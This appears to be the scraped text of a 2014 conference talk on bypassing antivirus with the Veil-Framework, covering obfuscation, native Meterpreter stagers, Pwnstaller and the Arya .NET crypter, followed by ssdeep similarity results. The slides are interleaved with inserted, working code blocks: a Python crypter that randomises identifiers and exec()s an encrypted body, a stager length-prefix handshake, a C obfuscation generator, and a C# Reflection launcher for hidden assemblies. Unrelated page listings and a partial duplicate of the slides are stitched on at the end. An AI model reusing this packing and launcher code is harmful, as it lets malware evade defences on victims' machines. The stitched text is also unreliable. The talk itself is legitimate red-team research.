Adventures in Asymmetric Warfare: Fighting the AV Vendors 
Will 
@harmj0y 
Veris Group - Adaptive Threat Division
@harmj0y 
● Security researcher and red teamer for the 
Adaptive Threat Division of Veris Group 
● Co-founder of the Veil-Framework #avlol 
o www.veil-framework.com 
o Shmoocon ‘14: AV Evasion with the Veil 
Framework 
o Defcon ‘14: Veil-Pillage: Post-exploitation 2.0 
o co-wrote Veil-Evasion, wrote Veil-Catapult, Veil-PowerView, Veil-Pillage, and PowerUp 
● Active Cortana and PowerShell hacker
tl;dr 
● Problem Space 
● How we got here and ethical issues 
● Approaches #avlol 
● Obfuscation methods 
● Payload Analysis
Teh Halting Problem? 
● Input: 
o a potentially malicious program P 
● Output: 
o True if executing P would cause the host computer 
to be “compromised” 
o False otherwise 
● def halts(P): 
      return isMalicious("removeMaliciousLogic(P); compromiseHost()") 
Problem Space 
● Anti-virus detection is an undecidable 
problem 
o That is, it’s impossible to design a 100% effective 
anti-virus solution 
● Though a perfect approach is impossible, 
approximations can be made 
● But detection is really really hard
Our Problem
How We Got Here 
● From 2009 on, antivirus started snarfing up 
more and more stock MSF payloads 
● We started researching basic ways to keep 
doing our job 
● All of our initial efforts drew from prior 
work, we don’t claim to have invented 
any of this stuff!!
Previous Work 
● Mark Baggett’s post Tips for Evading Anti-Virus 
During Pen Testing was the first 
public resource to talk about using Python to 
inject shellcode 
● We ended up mostly drawing from Debasish 
Mandal's Execute ShellCode Using Python 
o Uses the 
VirtualAlloc/CreateThread/WaitForSingleObject 
pattern
Our Solution 
● A way to get around antivirus as easily as 
professional malware 
o don’t want to roll our own backdoor each time 
o codebase built by myself, @ChrisTruncer and 
@TheMightyShiv 
● Generate payloads in a language and 
technique agnostic way 
● See the Shmoocon ‘14 presentation AV 
Evasion with the Veil-Framework for more 
background
Our Solution
Ethical Issues 
● The disclosure debate is 
nothing new... 
● Pentesters are 5+ years 
behind the professional 
malware community 
● This is a problem the bad 
guys have already solved, 
and better than we have!
Public Reaction 
“surely this will just result in 21 new signatures for all major 
AVs and then we're back to square one?” 
“Isn't our entire field meant to be working towards 
increasing security, rather than handing out fully 
functioning weapons?” 
“The other point here is that anything that helps to expose 
how in-effective AV really is at stopping even a 
minimally sophisticated attacker is a good thing.” 
http://www.reddit.com/r/netsec/comments/1fc2xp/veil_a_metasploit_payloa 
d_generator_for_bypassing/
Twitter Reaction
Approaches 
● We started with Python based shellcode 
injection techniques, soon branched into 
other languages 
● Similar payloads = : ( 
o started implementing basic obfuscation methods 
o and by basic, we mean basic 
● static signatures = #avlol
Obfuscation 1.0 
● Let’s randomize everything we possibly can 
o This works better than you think 
● Substitute in a randomized string for all 
variable and method names 
● Shuffle up everything as appropriate
Obfuscation 1.0
“Pyherion” 
● What if vendors still find a way to trigger on 
the malicious Python script sources? 
● We introduced Pyherion, a python ‘crypter’ 
inspired by Hyperion 
● Encrypts an entire Python file with a random 
AES key, base64’s it and rolls it all up 
into an exec(*) wrapper
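The two steps above, Obfuscation 1.0 (randomised identifiers) followed by a Pyherion-style exec() crypter, as an added example. This is not Veil-Evasion's or Pyherion's own code: AES is swapped for an HMAC-SHA256 counter keystream so it runs on the standard library alone, SAMPLE is a constructed script, and the launcher variable names and 12-character identifier length are choices of this example.

```python
"""Added example, not Veil-Evasion's own Obfuscation 1.0 or Pyherion code.
Step 1 renames every identifier the script defines itself (functions,
parameters, assigned variables) to a random string.  Step 2 wraps the result
the way Pyherion does: fresh random key, encrypted body, base64, exec().
AES is replaced by an HMAC-SHA256 counter keystream (stdlib only)."""
import ast, base64, builtins, hashlib, hmac, io, keyword, random, string, tokenize

# constructed sample script; any script the renamer can parse would do
SAMPLE = (
    "def checksum(data):\n"
    "    total = 0\n"
    "    for b in data:\n"
    "        total = (total * 31 + b) % 65521\n"
    "    return total\n"
    "result = checksum(b'hello world')\n"
)

def collect_local_identifiers(source):
    """Names the script defines; builtins, keywords and imported names stay untouched.
    Caveat: a local spelled like a keyword argument of a library call (a variable
    `key` next to sorted(..., key=...)) would break; a real tool tracks scopes."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            names.add(node.name)
        elif isinstance(node, ast.arg):
            names.add(node.arg)
        elif isinstance(node, ast.Name) and isinstance(node.ctx, ast.Store):
            names.add(node.id)
    return {n for n in names if not keyword.iskeyword(n) and n not in dir(builtins)}

def fresh_name(rng, taken, length=12):
    while True:
        cand = rng.choice(string.ascii_letters) + "".join(
            rng.choice(string.ascii_letters + string.digits) for _ in range(length - 1))
        if cand not in taken and not keyword.iskeyword(cand):
            taken.add(cand)
            return cand

def randomize_identifiers(source, rng):
    taken = set()
    mapping = {n: fresh_name(rng, taken) for n in sorted(collect_local_identifiers(source))}
    out, prev = [], None
    for tok in tokenize.generate_tokens(io.StringIO(source).readline):
        text = tok.string
        after_dot = prev is not None and prev.type == tokenize.OP and prev.string == "."
        if tok.type == tokenize.NAME and text in mapping and not after_dot:
            text = mapping[text]          # attribute names (obj.name) are left alone
        out.append((tok.type, text))
        prev = tok
    return tokenize.untokenize(out), mapping   # 2-tuples: untokenize re-spaces the code

def keystream(key, nonce, length):
    out, counter = bytearray(), 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(8, "little"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])

def xor_crypt(key, nonce, data):
    return bytes(a ^ b for a, b in zip(data, keystream(key, nonce, len(data))))

# the launcher re-derives the keystream, XORs the blob back and exec()s the source
WRAPPER = """import base64, hashlib, hmac
def {ks}(k, n, l):
    o, c = bytearray(), 0
    while len(o) < l:
        o += hmac.new(k, n + c.to_bytes(8, "little"), hashlib.sha256).digest()
        c += 1
    return bytes(o[:l])
{key} = base64.b64decode({key_b64!r})
{nonce} = base64.b64decode({nonce_b64!r})
{blob} = base64.b64decode({blob_b64!r})
exec(bytes(x ^ y for x, y in zip({blob}, {ks}({key}, {nonce}, len({blob})))).decode())
"""

def build_launcher(source, rng):
    obfuscated, mapping = randomize_identifiers(source, rng)
    key = bytes(rng.getrandbits(8) for _ in range(32))      # new key on every build
    nonce = bytes(rng.getrandbits(8) for _ in range(16))
    blob = xor_crypt(key, nonce, obfuscated.encode())
    taken = set(mapping.values())
    names = {slot: fresh_name(rng, taken) for slot in ("ks", "key", "nonce", "blob")}
    launcher = WRAPPER.format(key_b64=base64.b64encode(key).decode(),
                              nonce_b64=base64.b64encode(nonce).decode(),
                              blob_b64=base64.b64encode(blob).decode(), **names)
    return launcher, mapping

def demo(seed=None):
    """Return (value from the plain script, value from the launcher, launcher source)."""
    rng = random.Random(seed) if seed is not None else random.SystemRandom()
    launcher, mapping = build_launcher(SAMPLE, rng)
    plain, packed = {}, {}
    exec(SAMPLE, plain)
    exec(launcher, packed)
    return plain["result"], packed[mapping["result"]], launcher
```

demo() runs the original script and the packed launcher side by side and shows both compute the same value; the launcher text contains no identifier from the original and a different key and blob on every run (pass a seed only to reproduce a build).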
Obfuscation 1.5: Pure Stagers 
● What if vendors are triggering on the raw 
shellcode and decoders? 
● How about we eliminate shellcode all 
together, and build some native stagers? 
● They aren’t that complicated, thanks Raffi! 
o https://github.com/rsmudge/metasploit-loader 
o http://blog.strategiccyber.com/2013/06/28/staged-payloads-what-pen-testers-should-know/
Pure Stagers 
The meterpreter stager is surprisingly simple: 
1) a tcp connection is opened to the handler 
2) the handler spits back 4 bytes indicating 
the .dll size, and then the .dll itself 
3) socket number is pushed into EDI 
4) execution is passed to the .dll just like we 
do regular shellcode (void * or VirtualAlloc)
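The four-step handshake above, as an added example that is not Raffi's metasploit-loader or a Veil stager: handler and stager run in one process over a loopback socketpair, FAKE_STAGE is constructed bytes rather than a Meterpreter DLL, and step 3/4 (socket handle into EDI, jump into the buffer) is Windows-only and is represented by returning the buffer. The size cap is an addition of this example; the original loader trusts the handler.

```python
"""Added example: the reverse_tcp staging handshake, both sides, over a socketpair."""
import socket, struct, threading

FAKE_STAGE = b"MZ" + bytes(range(256)) * 2000   # ~512 KB, enough to force partial reads

def recv_exact(sock, n):
    """recv() may return fewer bytes than asked.  A stager that forgets this
    truncates the DLL on a slow link and crashes when it jumps into it."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("handler closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return bytes(buf)

def serve_stage(sock, stage):
    """Handler side (step 2): 4-byte little-endian length, then the stage itself."""
    sock.sendall(struct.pack("<I", len(stage)) + stage)

def receive_stage(sock, max_size=64 * 1024 * 1024):
    """Stager side: read the length prefix, sanity-check it, read the body."""
    (size,) = struct.unpack("<I", recv_exact(sock, 4))
    if size == 0 or size > max_size:
        raise ValueError("implausible stage size %d" % size)
    stage = recv_exact(sock, size)
    # Steps 3/4 on Windows: VirtualAlloc(RWX), copy, socket handle into EDI, call.
    return stage

def stage_over_loopback(stage):
    """Step 1 is the connection; a socketpair stands in for the TCP connect."""
    handler, stager = socket.socketpair()
    t = threading.Thread(target=serve_stage, args=(handler, stage))
    t.start()
    try:
        return receive_stage(stager)
    finally:
        stager.close()
        t.join()
        handler.close()

def truncated_handler_detected(stage):
    """Failure mode: the handler announces the full length but dies halfway."""
    handler, stager = socket.socketpair()
    def lie():
        handler.sendall(struct.pack("<I", len(stage)) + stage[: len(stage) // 2])
        handler.close()
    t = threading.Thread(target=lie)
    t.start()
    try:
        receive_stage(stager)
        return False
    except ConnectionError:
        return True
    finally:
        stager.close()
        t.join()
```

The only thing a detector sees on the wire is a 4-byte length and a blob, which is why the pure stagers carry no recognisable shellcode; the recv loop is the part most hand-rolled stagers get wrong.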
Pure Stagers 
● The following are the pure stagers currently 
available in the framework: 
Language     Stager 
Python       meterpreter/reverse_tcp 
Python       meterpreter/reverse_http 
Python       meterpreter/reverse_https 
C            meterpreter/reverse_tcp 
C            meterpreter/reverse_tcp_service 
C            meterpreter/reverse_http 
C            meterpreter/reverse_http_service 
C#           meterpreter/reverse_tcp 
C#           meterpreter/reverse_http 
C#           meterpreter/reverse_https 
PowerShell   meterpreter/reverse_tcp 
PowerShell   meterpreter/reverse_http 
PowerShell   meterpreter/reverse_https 
Ruby         meterpreter/reverse_tcp
Obfuscation 2.0 
● Variable obfuscation is great 
● But for things like C, this doesn’t work as 
well as we’d like 
● Can we introduce something a little more 
interesting?
Obfuscation 2.0 
● Our (slightly) more “advanced” C obfuscation 
involves our interpretation of a method nop 
o muck up dynamic analysis without affecting the 
actual execution of the program 
● General idea: 
o throw in enough processing functions that sufficiently 
complicate the call tree of the program 
● This is a basic version of what malware has 
been doing for years 
o shouldn’t be that effective, but it is!
Obfuscation 2.0 
● Choose a set of randomized string processing 
functions (reverse, split, etc.) 
● Malloc a randomized number of strings of 
randomized lengths 
● Intersperse these randomized functions 
throughout the actual code
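A generator in the spirit of the three steps above, as an added example (not Veil-Evasion's own C obfuscation code): it emits randomly named C string-processing functions (the "method nops"), a random number of malloc'd random strings, and interleaves calls to the nops around the real work. The set of four processing functions, the identifier lengths and the real_work() stub are assumptions of this example; the emitted C is C99 and builds with mingw32 or gcc.

```python
"""Added example: emit a C program padded with randomised 'method nop' functions."""
import random, string

# each template is a self-contained, side-effect-only string function: char *f(char *s)
TEMPLATES = {
    "reverse": (
        "char *{name}(char *s) {{\n"
        "    size_t n = strlen(s);\n"
        "    for (size_t i = 0; i < n / 2; i++) {{ char t = s[i]; s[i] = s[n - 1 - i]; s[n - 1 - i] = t; }}\n"
        "    return s;\n}}\n\n"),
    "upper": (
        "char *{name}(char *s) {{\n"
        "    for (char *p = s; *p; p++) *p = (char)toupper((unsigned char)*p);\n"
        "    return s;\n}}\n\n"),
    "rot13": (
        "char *{name}(char *s) {{\n"
        "    for (char *p = s; *p; p++) {{\n"
        "        if (*p >= 'a' && *p <= 'z') *p = (char)('a' + (*p - 'a' + 13) % 26);\n"
        "        else if (*p >= 'A' && *p <= 'Z') *p = (char)('A' + (*p - 'A' + 13) % 26);\n"
        "    }}\n    return s;\n}}\n\n"),
    "swapcase": (
        "char *{name}(char *s) {{\n"
        "    for (char *p = s; *p; p++) {{\n"
        "        if (islower((unsigned char)*p)) *p = (char)toupper((unsigned char)*p);\n"
        "        else if (isupper((unsigned char)*p)) *p = (char)tolower((unsigned char)*p);\n"
        "    }}\n    return s;\n}}\n\n"),
}

HEADER = (
    "#include <stdlib.h>\n#include <string.h>\n#include <ctype.h>\n\n"
    "/* placeholder for the real payload; an assumption of this example */\n"
    "static void real_work(void) { }\n\n"
)

def c_identifier(rng, taken, length=10):
    while True:
        cand = rng.choice(string.ascii_letters) + "".join(
            rng.choice(string.ascii_letters + string.digits) for _ in range(length - 1))
        if cand not in taken:
            taken.add(cand)
            return cand

def random_c_string(rng):
    return "".join(rng.choice(string.ascii_letters + string.digits)
                   for _ in range(rng.randint(8, 40)))

def generate_program(seed=None):
    """Return (C source, list of nop function names).  A seed reproduces one build."""
    rng = random.Random(seed) if seed is not None else random.SystemRandom()
    taken = set()
    kinds = list(TEMPLATES)
    # step 1: a randomised set of processing functions with random names
    names = [c_identifier(rng, taken) for _ in range(rng.randint(3, 8))]
    funcs = "".join(TEMPLATES[rng.choice(kinds)].format(name=n) for n in names)
    # step 2: a random number of malloc'd strings of random length
    strings = [c_identifier(rng, taken) for _ in range(rng.randint(2, 6))]
    body = []
    for v in strings:
        lit = random_c_string(rng)
        body.append('    char *%s = malloc(%d);\n    if (!%s) return 1;\n    strcpy(%s, "%s");\n'
                    % (v, len(lit) + 1, v, v, lit))
    # step 3: intersperse calls to the nops around the real work
    calls = ["    %s(%s);\n" % (n, rng.choice(strings))
             for n in names for _ in range(rng.randint(1, 3))]
    rng.shuffle(calls)
    cut = rng.randint(0, len(calls))
    body += calls[:cut] + ["    real_work();\n"] + calls[cut:]
    body += ["    free(%s);\n" % v for v in strings]
    src = HEADER + funcs + "int main(void) {\n" + "".join(body) + "    return 0;\n}\n"
    return src, names
```

Every build has a different call tree and different string constants, which is what defeats a static signature on the wrapper; the payload itself is unchanged, so anything that inspects real_work() still sees the same code.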
Obfuscation 2.0
Obfuscation 3.0 
● What if some vendors trigger on the 
Pyinstaller loader.exe itself? 
● How about a (reasonably) obfuscated version 
of the Pyinstaller loader? :) 
o BSides Boston ‘14: Pwnstaller 1.0 
o https://github.com/harmj0y/pwnstaller/ 
● Integrated into Veil-Evasion this past May
Pwnstaller 
● On each run: 
o Obfuscated code for all* source files associated with 
the Pyinstaller launcher are generated 
o mingw32 is used to compile everything into a new 
runw.exe, all on Kali \m/ 
o copy the runw.exe into the correct location 
o a randomized Windows icon is chosen for the final 
packaged result 
*see http://www.harmj0y.net/blog/python/pwnstaller-1-0/ for a full 
explanation
Obfuscation 4.0: Ruby 
● Since some people have started to pay 
attention to Pyinstaller binaries, let’s try 
some other languages: 
● C? sure, with some obfuscation 
● C#? mono can help with .NET 
● PowerShell? no disk writes? awesome 
● Ruby? Why not...
Ruby 
● Ruby has a foreign function interface just like 
Python does, the win32-api gem 
o This means we can inject shellcode, and can write 
native Meterpreter stagers! 
● And it has its own Pyinstaller analogue: 
OCRA (One Click Ruby application) 
o http://ocra.rubyforge.org/ 
● I wonder if we can get this running on Kali :)
Ruby Shellcode Injection
Ruby OCRA Compilation
Ruby Module Releases 
● The following payload modules are currently 
in the development branch, and will be 
merged into master for the 9/15/2014 
V-Day: 
o ruby/shellcode_inject/flat 
o ruby/meterpreter/reverse_tcp 
● Everything is compiled to a self-extracting 
Windows executable, all on Kali!
A .NET Crypter 
● C#/VB.net code is compiled, not interpreted, 
so we can’t build a dynamic obfuscator 
equivalent to Pyherion :( 
● Or can we? .NET has an interesting feature 
called Reflection: 
o “you can use reflection to create type instances at 
run time, and to invoke and access them” 
http://msdn.microsoft.com/en-us/library/f7ykdhsy(v=vs.110).aspx
A .NET Crypter 
● If we have an array of raw bytes of a .NET 
binary, we can run the entire executable 
from memory with 3 lines by utilizing 
Reflection: 
o Assembly a = Assembly.Load(bytes); 
o MethodInfo m = a.EntryPoint; 
o m.Invoke(a.CreateInstance(m.Name), null); 
o (Main is static, so the instance argument is ignored; 
the null parameter array assumes a Main() that takes 
no arguments) 
● We can obfuscate these bytes in any way we 
want beforehand
Arya: a .NET Crypter 
● A crypter for all .NET binaries was just 
pushed along with the Ruby payloads 
● A payload binary is generated and compiled 
as normal, the crypter then: 
o reads in the raw bytes 
o base64 encodes the data and builds a random 
substitution cipher for the string 
o builds a launcher/dropper that decodes the raw data 
and invokes the original binary using Reflection
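The encoding side of the crypter described above, as an added example that is not Veil's Arya source: base64 plus a random substitution cipher over the base64 alphabet, the matching decoder, and a C# launcher template that undoes the substitution and invokes the entry point via Reflection. FAKE_ASSEMBLY is constructed sample bytes, not a real PE, and the launcher's handling of a Main(string[] args) signature is an addition of this example.

```python
"""Added example: Arya-style base64 + substitution cipher, with a C# launcher template."""
import base64, random

B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
FAKE_ASSEMBLY = b"MZ\x90\x00" + bytes(range(256)) * 8   # constructed, not a real .NET binary

def build_substitution(rng):
    """A fresh permutation of the base64 alphabet per build; position i of the
    plain alphabet maps to position i of the cipher alphabet."""
    cipher = list(B64_ALPHABET)
    rng.shuffle(cipher)
    return "".join(cipher)

def encode(raw, rng):
    cipher = build_substitution(rng)
    table = str.maketrans(B64_ALPHABET, cipher)
    return base64.b64encode(raw).decode("ascii").translate(table), cipher

def decode(encoded, cipher):
    table = str.maketrans(cipher, B64_ALPHABET)
    return base64.b64decode(encoded.translate(table))

def roundtrip(raw, seed=None):
    """Return (encoded text, cipher alphabet, decoded bytes)."""
    rng = random.Random(seed) if seed is not None else random.SystemRandom()
    enc, cipher = encode(raw, rng)
    return enc, cipher, decode(enc, cipher)

# launcher/dropper: reverse the substitution, base64-decode, Assembly.Load, invoke EntryPoint
LAUNCHER_CS = """using System;
using System.Reflection;
using System.Text;

class Program
{
    static void Main()
    {
        string enc  = "%(enc)s";
        string from = "%(cipher)s";
        string to   = "%(plain)s";
        var sb = new StringBuilder(enc.Length);
        foreach (char c in enc) sb.Append(to[from.IndexOf(c)]);
        byte[] raw = Convert.FromBase64String(sb.ToString());
        Assembly a = Assembly.Load(raw);
        MethodInfo m = a.EntryPoint;
        // pass an empty argv when the embedded Main takes string[] args
        object[] args = m.GetParameters().Length == 0 ? null : new object[] { new string[0] };
        m.Invoke(null, args);
    }
}
"""

def build_launcher(raw, seed=None):
    rng = random.Random(seed) if seed is not None else random.SystemRandom()
    enc, cipher = encode(raw, rng)
    return LAUNCHER_CS % {"enc": enc, "cipher": cipher, "plain": B64_ALPHABET}
```

Because the alphabet permutation changes on every build, the encoded string shares no substrings with the plain base64 of the payload, which is what the ssdeep numbers in the next section measure.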
A .NET Crypter
Payload Analysis
ssdeep 
● ssdeep is a ‘fuzzy hashing’ static malware 
comparison tool, allowing for the 
comparison of malware families 
● “can match inputs that have homologies” 
o biology term, fancy way of saying degree of shared 
ancestry 
● Generated 1000 samples of some payload 
families and did ssdeep runs over each set
python/meterpreter/rev_tcp 
● (1000 choose 2) = 499500 possible pairing 
combinations for ssdeep 
● 169107 pairings (33.8%) matched at a score 
of 75/100 or better 
o Only 66 (.01%) scored at 90/100 or better 
o Average pairwise score: 74 
● What this means: only .01% of the pairings 
scored as a ‘similar’ malware family
python/meterpreter/rev_tcp
c/meterpreter/rev_tcp 
● Same 499500 possible pairings 
● 267387 pairings (53.5%) matched at a score 
of 25/100 or better 
o Only 2615 (0.5%) scored at 90/100 or better 
o Average pairwise score: 37 
● What this means: only .5% of the pairings 
scored as a ‘similar’ malware family 
o but wider variation than Python families
c/meterpreter/rev_tcp
cs/shellcode_inject/flat w/ Arya 
● Same 499500 possible pairings 
● Only 5 pairings (0.001%) matched at a 
score of 25/100 or better 
o none scored at 90/100 or better 
● What this means: none of the pairings scored 
as a ‘similar’ malware family 
o variation was all over the map!
Recap 
● Started our research out of necessity but 
continued it out of curiosity 
● Fuxoring AV vendors really isn’t that 
difficult 
● There are still ways to stop us :) 
● #avlol
Questions? 
● Contact me: 
o @harmj0y 
o harmj0y@veil-framework.com 
● Read more: 
o https://www.veil-framework.com 
● Get the goods: 
o https://www.github.com/Veil-Framework/Veil 
o https://github.com/HarmJ0y/stagers

UiPath Community: AI for UiPath Automation DevelopersUiPathCommunity
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfDianaGray10
 
Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Brian Pichman
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesMd Hossain Ali
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostMatt Ray
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesDavid Newbury
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...DianaGray10
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.YounusS2
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarPrecisely
 
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDEADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDELiveplex
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfDaniel Santiago Silva Capera
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URLRuncy Oommen
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UbiTrack UK
 
Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfAijun Zhang
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IES VE
 

Recently uploaded (20)

Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation Developers
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
 
Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond Ontologies
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity Webinar
 
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDEADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
 
20230104 - machine vision
20230104 - machine vision20230104 - machine vision
20230104 - machine vision
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URL
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
 
Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdf
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
 

Adventures in Asymmetric Warfare

  • 1. Adventures in Asymmetric Warfare: Fighting the AV Vendors
    Will @harmj0y
    Veris Group - Adaptive Threat Division

  • 2. @harmj0y
    ● Security researcher and red teamer for the Adaptive Threat Division of Veris Group
    ● Co-founder of the Veil-Framework #avlol
      o www.veil-framework.com
      o Shmoocon ‘14: AV Evasion with the Veil Framework
      o Defcon ‘14: Veil-Pillage: Post-exploitation 2.0
      o co-wrote Veil-Evasion, wrote Veil-Catapult, Veil-PowerView, Veil-Pillage, and PowerUp
    ● Active Cortana and PowerShell hacker

  • 3. tl;dr
    ● Problem Space
    ● How we got here and ethical issues
    ● Approaches #avlol
    ● Obfuscation methods
    ● Payload Analysis

  • 4. Teh Halting Problem?
    ● Input:
      o a potentially malicious program P
    ● Output:
      o True if executing P would cause the host computer to be “compromised”
      o False otherwise
    ● def halts(P):
          return isMalicious(“removeMaliciousLogic(P) compromiseHost()”)

  • 5. Problem Space
    ● Anti-virus detection is an undecidable problem
      o That is, it’s impossible to design a 100% effective anti-virus solution
    ● Though a perfect approach is impossible, approximations can be made
    ● But detection is really really hard

  • 7. How We Got Here
    ● From 2009 on, antivirus started snarfing up more and more stock MSF payloads
    ● We started researching basic ways to keep doing our job
    ● All of our initial efforts drew from prior work, we don’t claim to have invented any of this stuff!!

  • 8. Previous Work
